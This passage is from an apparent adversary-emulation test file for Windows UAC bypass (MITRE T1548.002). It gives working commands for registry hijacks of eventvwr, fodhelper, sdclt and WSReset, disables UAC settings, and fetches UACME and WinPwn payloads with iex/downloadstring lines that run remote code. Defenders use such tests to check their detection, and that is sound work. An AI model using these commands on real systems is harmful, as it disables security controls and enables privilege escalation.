7 User Account Control. Retrieved July 26, 2016.'
url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
- source_name: Fortinet Fareit
description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses
UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.
url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
- source_name: Github UACMe
description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.
url: https://github.com/hfiref0x/UACME
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.823Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
- Casey Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
description: "Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon
execution command prompt should be launched with administrative privileges.
\n"
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
'
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
description: |
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privalages
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
description: |
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
'
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
description: |
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
description: |
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
Upon execution administrative command prompt should open
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
name: powershell
- name: Bypass UAC by Mocking Trusted Directories
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
description: |
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
name: command_prompt
elevation_required: true
- name: Bypass UAC using sdclt DelegateExecute
auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7
description: |
Bypasses User Account Control using a fileless method, registry only.
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command to execute
type: string
default: cmd.exe /c notepad.exe
executor:
command: |
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command_to_execute}'
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
Start-Sleep -s 3
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
'
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
description: |
Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
supported_platforms:
- windows
executor:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
'
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
description: |
Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
For example, we can set the windir registry kye to: "cmd /k REM "
And forcefully run SilentCleanup task:
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the bat file
type: string
default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
executor:
command: '"#{file_path}"
'
name: command_prompt
elevation_required: false
- name: UACME Bypass Method 23
auto_generated_guid: 8ceab7a2-563a-47d2-b5ba-0995211128d7
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent:
DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\23 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 31
auto_generated_guid: b0f76240-9f33-4d34-90e8-3a7d501beb15
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent:
Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM
Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\31 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 33
auto_generated_guid: e514bb03-f71c-4b22-9092-9f961ec6fb03
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\33 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 34
auto_generated_guid: 695b2dac-423e-448e-b6ef-5b88e93011d6
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe
via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM
Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\34 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 39
auto_generated_guid: 56163687-081f-47da-bb9c-7b231c5585cf
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\39 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 56
auto_generated_guid: 235ec031-cd2d-465d-a7ae-68bab281e80e
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\56 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 59
auto_generated_guid: dfb1b667-4bb8-4a63-a85e-29936ea75f29
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and
DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM
Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\59 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: UACME Bypass Method 61
auto_generated_guid: 7825b576-744c-4555-856d-caf3460dc236
description: "Executes User Account Control Bypass according to the methods
listed below. Upon successful execution you should see event viewer load and
two administrative command prompts.\nNote: The cleanup_command's which kill
the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor:
Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod:
Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker
defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n"
supported_platforms:
- windows
input_arguments:
uacme_exe:
description: Path to uacme executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\uacme\61 Akagi64.exe
dependency_executor_name: powershell
dependencies:
- description: 'UACME executable must exist on disk at specified location ("#{uacme_exe}")
'
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" "PathToAtomicsFolder\..\ExternalPayloads\uacme" -Force
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\uacme.zip" -Force
executor:
command: '"#{uacme_exe}"
'
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
name: command_prompt
- name: WinPwn - UAC Magic
auto_generated_guid: 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
description: UAC bypass using Magic technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
- name: WinPwn - UAC Bypass ccmstp technique
auto_generated_guid: f3c145f9-3c8d-422c-bd99-296a17a8f567
description: UAC bypass using ccmstp technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
- name: WinPwn - UAC Bypass DiskCleanup technique
auto_generated_guid: 1ed67900-66cd-4b09-b546-2a0ef4431a0c
description: UAC bypass using DiskCleanup technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
- name: WinPwn - UAC Bypass DccwBypassUAC technique
auto_generated_guid: 2b61977b-ae2d-4ae4-89cb-5c36c89586be
description: UAC Bypass DccwBypassUAC technique via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
name: powershell
- name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
key
auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
description: "Disable User Account Conrol (UAC) for admin by setting the registry
key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
\n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
\n[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)\n"
supported_platforms:
- windows
executor:
command: |-
$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
'
name: powershell
elevation_required: true
- name: UAC Bypass with WSReset Registry Modification
auto_generated_guid: 3b96673f-9c92-40f1-8a3e-ca060846f8d9
description: "The following UAC bypass is focused on a registry key under \"HKCU:\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\"
that will trigger a command once wsreset.exe runs. \nThis bypass is limited
to Windows 10 1803/1809 and may not run on Server platforms. The registry
mod is where interest will be.\nIf successful, the command to run will spawn
off wsreset.exe. \n[UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/)\n"
supported_platforms:
- windows
input_arguments:
commandpath:
description: Registry path
type: string
default: HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
commandtorun:
description: Command to run
type: string
default: C:\Windows\System32\cmd.exe /c start cmd.exe
executor:
command: |-
New-Item #{commandpath} -Force | Out-Null
New-ItemProperty -Path #{commandpath} -Name "DelegateExecute" -Value "" -Force | Out-Null
Set-ItemProperty -Path #{commandpath} -Name "(default)" -Value "#{commandtorun}" -Force -ErrorAction SilentlyContinue | Out-Null
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
cleanup_command: 'Remove-Item #{commandpath} -Recurse -Force
'
name: powershell
- name: Disable UAC - Switch to the secure desktop when prompting for elevation
via registry key
auto_generated_guid: 85f3a526-4cfa-4fe7-98c1-dea99be025c7
description: "User Account Control (UAC) is a security mechanism for limiting
the elevation of privileges, including administrative accounts, unless authorized.
\nThis setting ensures that the elevation prompt is only used in secure desktop
mode.\nDisable User Account Conrol (UAC) for secure desktop by setting the
registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop
to 0.\n"
supported_platforms:
- windows
executor:
command: Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name PromptOnSecureDesktop -Value 0 -Type Dword -Force
cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
-Name PromptOnSecureDesktop -Value 1 -Type Dword -Force
'
name: powershell
elevation_required: true
- name: Disable UAC notification via registry keys
auto_generated_guid: 160a7c77-b00e-4111-9e45-7c2a44eda3fd
description: 'This atomic regarding UACDisableNotify pertains to the notification
behavior of UAC. UAC is a critical security feature in Windows that prevents
unauthorized changes to the operating system. It prompts the user for permission
or an administrator password before allowing actions that could affect the
system''s operation or change settings that affect other users. The BlotchyQuasar
RAT defense evasion activities that the adversary to disable UAC notifications
makes it easier for malware and malicious software to execute with elevated
